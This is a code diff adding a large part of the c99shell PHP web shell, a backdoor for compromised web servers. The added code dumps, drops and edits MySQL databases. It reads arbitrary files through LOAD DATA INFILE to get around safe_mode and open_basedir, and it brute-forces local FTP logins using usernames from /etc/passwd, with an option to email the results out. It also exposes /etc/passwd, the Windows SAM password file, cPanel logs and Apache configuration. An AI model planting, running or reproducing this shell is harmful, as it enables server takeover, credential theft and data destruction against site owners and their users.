+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = false;
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = true;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = true;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>»</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = false;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$true = (!in_array($sh,array("/bin/false","/sbin/nologin")));}
+   else {$true = true;}
+   if ($true)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return true;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = false;}
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
